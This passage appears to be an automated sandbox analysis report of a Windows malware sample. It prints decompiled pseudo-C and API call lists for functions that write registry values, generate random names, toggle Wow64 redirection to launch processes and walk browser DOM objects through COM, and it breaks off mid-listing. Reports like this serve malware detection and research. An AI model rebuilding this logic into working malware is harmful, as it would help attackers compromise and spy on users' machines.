                                • Instruction ID: cbe1ca85301f2866ea0aaa1f262ffc2d6c31666b851d20c029910f52d873ef67
                                • Opcode Fuzzy Hash: 4656ae204aad5d2bc1ae60d67090fdc29226b1e2f42d914cc53702b35c2d0473
                                • Instruction Fuzzy Hash: F1213DB170124AAFD750EFA9D944E9A77ECEB48744B054E27E409C7222E779F901CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E04811D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				intOrPtr _t64;
                                				char _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x481a38c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E04814AA6( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					if(E04817702(_t92, _t97, _t101, _t91, _t59) != 0) {
                                						L27:
                                						E048150CA(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x481a2cc; // 0x68d9c98
                                					_t16 = _t64 + 0xc; // 0x68d9d8c
                                					_t65 = E04814AA6(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d048190
                                						if(E04815F2A(_t97,  *_t33, _t91, _a8,  *0x481a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                							_t68 =  *0x481a2d4; // 0x20bd5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x481b9e0; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x481b9db; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							if(E04815927(_t69,  *0x481a384,  *0x481a388,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x481a2d4; // 0x20bd5a8
                                									_t44 = _t71 + 0x481b86a; // 0x74666f53
                                									_t73 = E04814AA6(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d048190
                                										E04811F7A( *_t47, _t91, _a8,  *0x481a388, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d048190
                                										E04811F7A( *_t49, _t91, _t99,  *0x481a380, _a16);
                                										E048150CA(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d048190
                                									E04811F7A( *_t40, _t91, _a8,  *0x481a388, _a24);
                                									_t43 = _t101 + 0x10; // 0x3d048190
                                									E04811F7A( *_t43, _t91, _a8,  *0x481a380, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E048150CA(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d048190
                                					_t81 = E04816A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d048190
                                							E04815F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E048150CA(_t100);
                                						_t98 = _a16;
                                					}
                                					E048150CA(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E048177A4(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x481a38c);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}
























                                APIs
                                • StrChrA.SHLWAPI(048130C2,0000005F,00000000,00000000,00000104), ref: 04811D8A
                                • lstrcpy.KERNEL32(?,?), ref: 04811DB7
                                  • Part of subcall function 04814AA6: lstrlen.KERNEL32(?,00000000,068D9C98,74ECC740,048113D0,068D9E9D,048155DE,048155DE,?,048155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04814AAD
                                  • Part of subcall function 04814AA6: mbstowcs.NTDLL ref: 04814AD6
                                  • Part of subcall function 04814AA6: memset.NTDLL ref: 04814AE8
                                  • Part of subcall function 04811F7A: lstrlenW.KERNEL32(?,?,?,04811F20,3D048190,80000002,048130C2,04814106,74666F53,4D4C4B48,04814106,?,3D048190,80000002,048130C2,?), ref: 04811F9F
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 04811DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 42803f854b603280733cce53e9bd26846fa95bdaac4a4abd0c2ed28d55eaf92e
                                • Instruction ID: 101436ac45113fe398f4f87a6f12d67277db6ce28f1c7c397b168785a76d7b6d
                                • Opcode Fuzzy Hash: 42803f854b603280733cce53e9bd26846fa95bdaac4a4abd0c2ed28d55eaf92e
                                • Instruction Fuzzy Hash: 5151487250020ABFDF219FA4EC44EAA7BBDEB48314F008E16FA15D2170E775E965DB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 32%
                                			E04816BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                				intOrPtr _v36;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				void _v60;
                                				char _v64;
                                				long _t18;
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				long _t29;
                                				intOrPtr _t30;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                
                                				_t30 = __edi;
                                				_t29 = _a4;
                                				_t31 = __eax;
                                				_t18 = E04812902(_t29, __edi, __eax);
                                				_a4 = _t18;
                                				if(_t18 != 0) {
                                					memset( &_v60, 0, 0x38);
                                					_t22 =  *0x481a2d4; // 0x20bd5a8
                                					_v64 = 0x3c;
                                					if(_a8 == 0) {
                                						_t7 = _t22 + 0x481b4c8; // 0x70006f
                                						_t23 = _t7;
                                					} else {
                                						_t6 = _t22 + 0x481b8f8; // 0x750072
                                						_t23 = _t6;
                                					}
                                					_v36 = _t31;
                                					_t32 = __imp__;
                                					_v52 = _t23;
                                					_v48 = _t29;
                                					_v44 = _t30;
                                					 *_t32(0);
                                					_push( &_v64);
                                					if( *0x481a100() != 0) {
                                						_a4 = _a4 & 0x00000000;
                                					} else {
                                						_a4 = GetLastError();
                                					}
                                					 *_t32(1);
                                				}
                                				return _a4;
                                 			}

                                APIs
                                  • Part of subcall function 04812902: SysAllocString.OLEAUT32(?), ref: 0481295E
                                  • Part of subcall function 04812902: SysAllocString.OLEAUT32(0070006F), ref: 04812972
                                  • Part of subcall function 04812902: SysAllocString.OLEAUT32(00000000), ref: 04812984
                                  • Part of subcall function 04812902: SysFreeString.OLEAUT32(00000000), ref: 048129E8
                                • memset.NTDLL ref: 04816C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04816C41
                                • GetLastError.KERNEL32 ref: 04816C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04816C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: b9143613f529bba45c99b33f398ce2c4b43853af7e9d7db7c646750761c0a421
                                • Instruction ID: 2e1ca86fd67e9cffe7d7d1f0638c1e68580735f278e36cd452b23d9bfc35d8ff
                                • Opcode Fuzzy Hash: b9143613f529bba45c99b33f398ce2c4b43853af7e9d7db7c646750761c0a421
                                • Instruction Fuzzy Hash: 631100B1A00218AFDB00DF59D885BD97BBCEB08794F008917E909E7251E774E544CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.NTDLL(04814A23,048170D9,00000010,?,?,?,04814A23,00000001,048170D9,00000000,?,048162B1,00000000,048170D9,?,00000000), ref: 04813A16
                                • memcpy.NTDLL(00000000,00000000,068D9630,00000010), ref: 04813AA9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 04813B01
                                • GetLastError.KERNEL32 ref: 04813B33
                                • GetLastError.KERNEL32 ref: 04813B47
                                • GetLastError.KERNEL32(?,?,?,04814A23,00000001,048170D9,00000000,?,048162B1,00000000,048170D9,?,00000000,048170D9,00000000,068D9630), ref: 04813B5C
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: 0a16b01abfc7397a338b7995a1819e90e22783d1de9e6a7cdc0c9d023353cb85
                                • Instruction ID: c150a8491b32d65019fadd4bada373e7ae812f60c6978dc6f613e7064e6bca30
                                • Opcode Fuzzy Hash: 0a16b01abfc7397a338b7995a1819e90e22783d1de9e6a7cdc0c9d023353cb85
                                • Instruction Fuzzy Hash: 8C514FB1900208FFEF10DFA5D884EAEBBBDEB04354F008926F905E6160E775AE54DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E04812A23(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E04816837(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E048150CA(_v16);
                                								goto L37;
                                							}
                                							_t103 = E04816837((_v8 + _v8 + 5) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x481a2cc = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                 			}

                                APIs
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • lstrcpy.KERNEL32(63699BC4,00000020), ref: 04812B20
                                • lstrcat.KERNEL32(63699BC4,00000020), ref: 04812B35
                                • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04812B4C
                                • lstrlen.KERNEL32(63699BC4), ref: 04812B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: a8f2207d0453f9f63239220413a9c8ce36fb4869f13dfc27964ba881bf50ddb7
                                • Instruction ID: 72996110c80b74775f47a97f8df9f64eda56e594c50efb9a4ed8ed198901294f
                                • Opcode Fuzzy Hash: a8f2207d0453f9f63239220413a9c8ce36fb4869f13dfc27964ba881bf50ddb7
                                • Instruction Fuzzy Hash: F651B471A00108EFDF25DF99C584AADBBBAFF45314F058997E815EB221C770BA81CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04814C1B(intOrPtr _a4) {
                                				void* _t2;
                                				long _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0x481a2c4 = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 <= 5) {
                                					_t5 = 0x32;
                                					return _t5;
                                				}
                                				 *0x481a2b4 = _t4;
                                				_t6 = GetCurrentProcessId();
                                				 *0x481a2b0 = _t6;
                                				 *0x481a2bc = _a4;
                                				_t7 = OpenProcess(0x10047a, 0, _t6);
                                				 *0x481a2ac = _t7;
                                				if(_t7 == 0) {
                                					 *0x481a2ac =  *0x481a2ac | 0xffffffff;
                                				}
                                				return 0;
                                 			}

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04816B4E,?,?,00000001), ref: 04814C23
                                • GetVersion.KERNEL32(?,00000001), ref: 04814C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 04814C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04814C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 04814C7D
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 8b941a6de3ad5d7a90a023822a76434eeb25119499dfc8c2ee2a3a7b74863ffd
                                • Instruction ID: 0768999483528416099b3576534fddc9b03fa45a56bf6eb4e06421c72b8b98da
                                • Opcode Fuzzy Hash: 8b941a6de3ad5d7a90a023822a76434eeb25119499dfc8c2ee2a3a7b74863ffd
                                • Instruction Fuzzy Hash: F7F017B0B463019FD724AF65E819B253BACE704B41F104E1BE54AC61F0D77A9941CF25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 0481165B
                                • SysFreeString.OLEAUT32(00000000), ref: 0481173E
                                  • Part of subcall function 04816C6D: SysAllocString.OLEAUT32(048192B0), ref: 04816CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04811792
                                • SysFreeString.OLEAUT32(?), ref: 048117A0
                                  • Part of subcall function 04811FC2: Sleep.KERNEL32(000001F4), ref: 0481200A
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: ea9997439459595bcb8589ed3ad6d36204b065a3c0ec2127db4670269dfe6edc
                                • Instruction ID: 2897a0fdc36bcef84ad40e898def8fea52595df5b6ed142508b7069975fc3ee4
                                • Opcode Fuzzy Hash: ea9997439459595bcb8589ed3ad6d36204b065a3c0ec2127db4670269dfe6edc
                                • Instruction Fuzzy Hash: 73513375900249EFCB00DFE8C88889EB7BAFF88344B148D6AE605DB324D775AD45CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E04816C6D(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				intOrPtr* _t67;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr* _t74;
                                				intOrPtr* _t76;
                                				intOrPtr _t78;
                                				intOrPtr* _t82;
                                				intOrPtr* _t86;
                                				intOrPtr _t102;
                                				intOrPtr _t108;
                                				void* _t117;
                                				void* _t121;
                                				void* _t122;
                                				intOrPtr _t129;
                                
                                				_t122 = _t121 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t117 >= 0) {
                                					_t54 = _v8;
                                					_t102 =  *0x481a2d4; // 0x20bd5a8
                                					_t5 = _t102 + 0x481b038; // 0x3050f485
                                					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t117 >= 0) {
                                						__imp__#2(0x48192b0);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t117 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t86 = __imp__#6;
                                							_t117 = _t61;
                                							if(_t117 >= 0) {
                                								_t63 = _v24;
                                								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t117 >= 0) {
                                									_t129 = _v20;
                                									if(_t129 != 0) {
                                										_v64 = 3;
                                										_v48 = 3;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t129 > 0) {
                                											while(1) {
                                												_t67 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t122 = _t122;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                												if(_t117 < 0) {
                                													goto L16;
                                												}
                                												_t69 = _v8;
                                												_t108 =  *0x481a2d4; // 0x20bd5a8
                                												_t28 = _t108 + 0x481b0bc; // 0x3050f1ff
                                												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                												if(_t117 >= 0) {
                                													_t74 = _v16;
                                													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                													if(_t117 >= 0 && _v12 != 0) {
                                														_t78 =  *0x481a2d4; // 0x20bd5a8
                                														_t33 = _t78 + 0x481b078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t82 = _v16;
                                															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                														}
                                														 *_t86(_v12);
                                													}
                                													_t76 = _v16;
                                													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                												}
                                												_t71 = _v8;
                                												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t86(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t117;
                                			}

                                APIs
                                • SysAllocString.OLEAUT32(048192B0), ref: 04816CBD
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04816D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 04816DB8
                                • SysFreeString.OLEAUT32(?), ref: 04816DE7
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 29e11316fc06f6e86e946a21cce9797582be0e0abdaa7d3e45c7d1c5184e1261
                                • Instruction ID: 58c8720fb21b51294cbdbf01dd572ab0b9eb385f6b5f65455a9d539b33dd4cd2
                                • Opcode Fuzzy Hash: 29e11316fc06f6e86e946a21cce9797582be0e0abdaa7d3e45c7d1c5184e1261
                                • Instruction Fuzzy Hash: 89512175D00519DFCB00DFA8C48889EB7B9FF89704F144A99E915EB325D776AD01CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E04815D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v156;
                                				void _v428;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E048128F1(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E04811000(_t79,  &_v428);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04813915(_t101,  &_v428, _a8, _t96 - _t81);
                                					E04813915(_t79,  &_v156, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                					_t66 = E04811000(_t101,  &E0481A188);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E04811000(_a16, _a4);
                                						E04813B6F(_t79,  &_v428, _a4, _t97);
                                						memset( &_v428, 0, 0x10c);
                                						_t55 = memset( &_v156, 0, 0x84);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L04817D8C();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L04817D86();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                						_a12 = _t74;
                                						_t76 = E0481679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v156;
                                							if(E04815AC5(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E04814A54(_t79,  &_v156, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(_a8 * 4 +  &E0481A188) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04815E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04815E5C
                                • memset.NTDLL ref: 04815F05
                                • memset.NTDLL ref: 04815F1B
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp
